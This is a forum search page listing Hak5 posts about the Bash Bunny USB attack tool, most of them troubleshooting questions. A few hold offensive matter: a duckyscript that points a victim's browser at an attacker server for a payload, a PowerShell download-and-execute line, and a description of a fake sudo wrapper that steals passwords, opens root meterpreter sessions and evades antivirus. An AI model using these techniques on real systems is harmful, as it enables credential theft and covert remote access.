
Showing results for tags 'bash bunny'.




Found 56 results

  1. Dear everyone, I am doing some experimenting with my new Bash Bunny and was wondering, once I enable an ATTACKMODE interface, if it is possible to disable it after a little while without turning off the payload. For example, I am trying ATTACKMODE HID STORAGE and then wondering if I can do something like DISABLE STORAGE or something like that. I know to some of you this is probably going to seem like a stupid question, but if anyone knows the answer can you please share. Thank you!!!
  2. I'm trying to install impacket and responder to my BB using the .deb files provided on another thread; however, my bunny doesn't seem to recognise the updated tools folder. When I copy the files, eject and plug back in, it just boots as normal and doesn't copy anything to its /tools on its Linux partition. I found a previous thread saying to delete everything, change the version.txt file to an earlier version and run the updater, but I don't wanna mess it up any more than it already is. I've tried restoring by inducing 3 failed boots to restore to factory but that hasn't seemed to work.
  3. My first payload: Watch THE movie in the terminal

        LED ATTACK
        ATTACKMODE HID
        QUACK CTRL-ALT t
        sleep 1
        QUACK STRING "telnet towel.blinkenlights.nl"
        QUACK ENTER
        LED FINISH
        ATTACKMODE OFF

    https://github.com/internetblacksmith/bunnywars
  4. Hi, I just bought my first Bash Bunny and tried to update it to the 1.5 release. I read the docs about it, downloaded the updater and started it. Everything is going well, the download ends and the key blinks in red and blue. But once that's done, it becomes solid red and nothing else happens. My current version (version.txt): 1.3_267. I'm using Windows and don't have any other OS available right now. Thanks in advance for your help, can't wait to use it!
  5. sub0

    [PAYLOAD] AutoPwn

    Hello, I had an idea for a sort of cross-platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the target's user agent. This is only a PoC, nothing finalized at all, but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript:

        DELAY 1000
        ALT F2
        DELAY 50
        GUI SPACE
        GUI r
        DELAY 50
        BACKSPACE
        DELAY 100
        STRING http://10.10.0.53:8080/
        ENTER

    This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with Windows at all, been years since I used it (I'm a total Linux nerd), so my PowerShell payload is probably terrible. I would welcome any and all improvements, ideas, etc. Thanks for reading! - sub0

    autopwn.py
  6. I am quite new to the Bash Bunny and programming in general - I am literally a n00b, so any feedback or advice would be helpful. I am trying to create a payload that can potentially increase the number of switches, which may be useful in particular environments such as when you don't have direct access to your own computer, specifically without using STORAGE.

    The way it works is the following: In the UDISK directory \payloads\, by default there are only two switches; with Nswitch, you can potentially have any number of switches (restricted by the storage of course); so in addition to the above directories, you can also create:

    Now switch1 is the Nswitch controller - the Nswitch can be changed in two ways, depending on whether you have a lockscreen or not. It is also able to detect the state of the lockscreen (which may be useful in other applications where you can set up two different attacks depending on the state).

    If there is no lockscreen - then the Bash Bunny will run a HTTP server, and you can set the switch number from http:\\172.16.64.1 directly.

    If there is a lockscreen - then the Bash Bunny will simply increase the value of N incrementally by 1, i.e. each time you plug in the device N:=N+1. This also works if you don't have direct access to a computer; you can simply change the switch by repeatedly plugging it into a USB Power Bank (although this may take some time to reach switch6, as you would have to wait for the Bunny to boot up and the LEDs to flash and repeat this 6 times, which isn't ideal in every situation).

        #!/bin/bash
        LED SETUP
        ATTACKMODE HID RNDIS_ETHERNET
        GET TARGET_IP
        GET HOST_IP
        GET SWITCH_POSITION
        cd /root/udisk/payloads/$SWITCH_POSITION
        if [ -z "${TARGET_IP}" ]; then
            LED FAIL2
            exit 1
        fi
        if [ ! -f Nswitch.txt ]; then
            echo 0 > Nswitch.txt
        fi
        LED STAGE1
        #Detecting lockscreen
        tcpdump -l -i usb0 'icmp and icmp[icmptype]=icmp-echo' -vv > ping &
        # Windows OS specific, can change to RUN OSX or RUN UNITY
        RUN WIN ping $HOST_IP -n 1
        sleep 1
        if grep "ICMP" ping > /dev/null
        then
            echo 1 > lockscreen # Unlocked
            LED G DOUBLE
            #Try Captive portal to overcome some restrictions?
            python -m SimpleHTTPServer 80 &
            while ! nc -z localhost 80; do sleep 0.2; done
        else
            echo 0 > lockscreen # Locked
            LED R DOUBLE
            N=0; for i in `cat Nswitch.txt`; do N=$((1 + $i)); done; echo $N > Nswitch.txt
        fi
        cp /root/udisk/payloads/switch$N /root/udisk/payloads/switch1

    with

        <form name="web_form" id="web_form" method="post" action="post.php">
        <p><label>Nswitch:</label><input type="number" name="N" id="N" /></p>
        <input type="submit" value="Ammend">
        </form>

    and

        <?php
        $N = $_POST['N'];
        $fp = fopen("Nswitch.txt", "a");
        $savestring = $N;
        fwrite($fp, $savestring); // fwrite() takes the file handle as its first argument
        fclose($fp);
        ?>

    It still isn't complete yet but I have been able to detect the lockscreen state successfully. I did have some issues with the web server at first but this has been mostly resolved, I just need to finish off the code. Before I do, I thought I would get some advice from the Hak5 community on whether this payload would even be useful to other people, and how I could optimize the code or make it better. I should mention that once you set the switch number N it will automatically copy the files of the directory from \payloads\switchN to the other switch (i.e. switch 2 in the example above), and once you unplug the Bunny, change the switch and replug it, it will run the payload from switch N on switch 2.
  8. Not sure if this is the right place for this... What are the best defenses against this attack? I'm more interested in logical controls that can be implemented to protect against this threat than physical ones.
  9. Hey guys, New to the forums, I have been playing with the bash bunny and so far I really think it rocks! One feature I would like to have is the option for a three device attack; HID, Mass Storage and RO Mass Storage. 1- HID for attack execution 2- Mass Storage for logging of attack result 3- RO Mass Storage for tools, such as installers etc Is this possible?
  10. Is there any way I can control winbox with the Bash Bunny? I don't know where the winbox is. 1st I need to search for it, then control it with the Bash Bunny. Can I do it? With PowerShell or cmd? Thanks :)
  11. Capsos

    No Loot

    Happy New Year all. Been checking the updates with the auto updater and new payloads. I've run a few on an older laptop I use for training in case I Fook it up..... Well, I've tried a few of them now and all the RGB flash to the correct sequence. I have tried it with the laptop locked and unlocked, and both times when I check I have an empty loot folder!! Any ideas? I have tried disabling my security protection just in case but still nothing! Thanks in advance
  12. Hey all, I have got a new Bash Bunny and plugged it into a USB2 port in switch position 1, and Windows started to install: Usb composite device READY CDC Serial NO DRIVER FOUND USB Mass Storage Device READY USB Device READY. Where can I find the CDC driver?
  13. So I have been experimenting with my bash bunny and preparing it for a Windows 7 PowerShell download file and execute. I am in a VirtualBox so that may be the problem! So inside the PowerShell command I use () and : and Windows 7 cmd translates "(" to 9 and ")" to 0 and ":" to ; and all uppercase things are typed as lowercase. The command: Q STRING "powershell(new-object net.webclient).DownloadFile('xxx','xxx'); " Another issue is that the URL I am downloading has uppercase characters which are not being typed into the cmd. Thanks in advance and HACK THE PLANET ~~0x5a
  14. I tried updating my Bash Bunny to 1.4 today, and it was going well... Then, after I ejected it and put it back in to start the update, it started flashing a "police" pattern. I am back on version 1.0 and no matter what update I download, I am not able to go up. I would really like some help... I don't understand what is wrong.
  15. So I've been trying to run ducky script in a bash bunny payload, but as soon as it hits the ducky script it stops.

        LED SETUP
        GET SWITCH_POSITION
        ATTACKMODE HID
        LED ATTACK
        RUN WIN notepad.exe
        QUACK DELAY 300
        QUACK STRING (\___/)
        QUACK ENTER
        QUACK DELAY 300
        QUACK STRING (='.'=)
        QUACK ENTER
        QUACK DELAY 300
        QUACK STRING (")_(")
        QUACK DELAY 300

    I can't figure out the problem
  16. Hey hey :-) How do I correctly install the DuckyLibraryUpdate? When I copy the content of the DuckyLibraryUpdate folder to switch1, unplug safely, switch to switch1 and plug in, the LED goes off... What am I doing wrong? Do I need to copy the install.sh to another place? I use it on macOS High Sierra and with a German keyboard layout... Thank you for your help! Cheers, Florian
  17. Hi folks, I have problems getting the Bash Bunny to work on macOS High Sierra! It's possible to ssh into the bunny but I can't run apt update etc... I have followed the bunny wiki and installed squid... it runs... but when I want to apt update I get this output:

        root@bunny:~# apt update
        Err http://httpredir.debian.org jessie InRelease
        Err http://httpredir.debian.org jessie Release.gpg
          Could not resolve 'httpredir.debian.org'
        Reading package lists... Done
        Building dependency tree
        Reading state information... Done
        All packages are up to date.
        W: Failed to fetch http://httpredir.debian.org/debian/dists/jessie/InRelease
        W: Failed to fetch http://httpredir.debian.org/debian/dists/jessie/Release.gpg  Could not resolve 'httpredir.debian.org'
        W: Some index files failed to download. They have been ignored, or old ones used instead.

    Any ideas? Thanks so much, Florian
  18. After following the guide for 'unblocking' my Bash Bunny, I have been unable to install any of the tools. I have verified the tools are not installed by looking in the tools folder on the Linux side and using payloads that require specific tools like Responder. I've gone through the standard instructions for installing tools... put the Bash Bunny in arming mode, transfer the files into the 'tools' folder, safely eject, and reinsert while still in arming mode. When I do this, the Bash Bunny just boots like normal. The LED never goes magenta and the files are still in the 'tools' folder. Any payload that requires a specific tool will fail. Thoughts? Suggestions? Any help would be appreciated.
  19. Hi Hak5 forums, I started to play around with some Bash Bunny payloads, and wanted to tweak the LED output which is shown during the execution of a payload. I searched around a bit, but couldn't find any listings of the LED options or commands to trigger them. Does anyone know all the LED options and the commands for them so that I could try them, or have a source where they are already listed? Cheers, D
  20. I want to create a couple of new keyboard layouts for the community. I downloaded USBlyzer, so that I could observe the key codes for all the keys on my keyboard. On a Czech keyboard, some special characters need "special attention". For example, the pipe character is not present, unless I press "leftCtrl+leftAlt+w". Once I do that, I can see the code in USBlyzer:

        05 00 1a 00 00 00 00 00

    So far so good. I went to /languages/us.json, made a copy, named it cz.json, and changed the pipe line accordingly:

        "|":"05,00,1a"

    Then I created this simple payload.txt to see if it is pressed (I have Czech layout turned on):

        ATTACKMODE HID STORAGE
        DUCKY_LANG cz
        QUACK STRING bla\|aa

    When I tried this, I can only see the "blaaa" string being shown, no pipe character is present. Note that when I change DUCKY_LANG to "us" it works and writes the pipe character as expected. Am I missing something, or does Bash Bunny have some issues with running these commands?
  21. There are some keyboard layouts which don't have special characters (e.g. Slovak or Czech) like pipe or backslash. Since such characters can't be single-pressed on the keyboard, I was thinking about writing inside the QUACK file.txt file some specific code with ALT encoding, e.g.

        STRING command1
        ALT 124
        STRING command2

    which would simply be written as

        command1 | command2

    Unfortunately, I'm unable to write such an ALT 124 key combination. Is this approach possible with Bash Bunny?
  22. Taking the idea (again, mad props to sudoBackdoor) a bit further with some python scripting, I scared myself (and unintentionally pwned myself a few times as well) with this thing. How it works: The user's .bash_profile or .bashrc gets tweaked to point to ~/.config/sudo A python script called sudo is installed there. [Patience is required here, as you need to wait for the user to sudo some command now] This will take their password, validate it by running its own sudo command (literally just echoing something) and seeing if it works Once it confirms a good password, it stores the password for later retrieval and executes the intended sudo command in a subshell that the user shouldn't even notice a difference in After executing their command, it will use the password to sudo open up a reverse https meterpreter session on the machine. It will do this every time sudo is run. I unintentionally self pwned a few times, because the meterpreter session is being run as root, and one must sudo kill to get rid of it. Sudo killing it will get rid of the existing session as expected, but then will open up a shiny new session as its last step (unless the python script is gone). Because antivirus tends to recognize the base64-encoded meterpreter payload as malicious, I also wrote a script called "shellSmuggler.py" to go with it. If you use the msfvenom command I supply here, you should be able to pipe the output to the shellSmuggler and scramble the payload enough that antivirus doesn't alert on/block it anymore. You will need to know your listening machine's IP and listening port (obviously).
  23. Guys, I downloaded all the 3 tools in the forum but I don't know if they are installed or not, and by the way none of the payloads are working
  24. Guys, I just got my BB and I updated it to the latest firmware and I downloaded all the payloads but none of them works (more specifically, they create an empty folder in "loots" with the name of the payload)... I assumed it was because I didn't have any tools... so I downloaded all of the tools from the "hak5 forums"... and in order for the tools to install I should unplug and plug my BB in arming mode again, but every time I open my "tools" folder in my BB it's empty (despite having downloaded them several times)... what is the problem?... what should I do? PS (I'm working with Windows 10)
  25. Harllen Dias

    Tools

    Good afternoon, I am having difficulty installing the tools on my Bash Bunny. I copied the .deb files to tools but they do not install; when I connect in arming mode the files are still there. Firmware v1.3 is installed. Sorry for the English.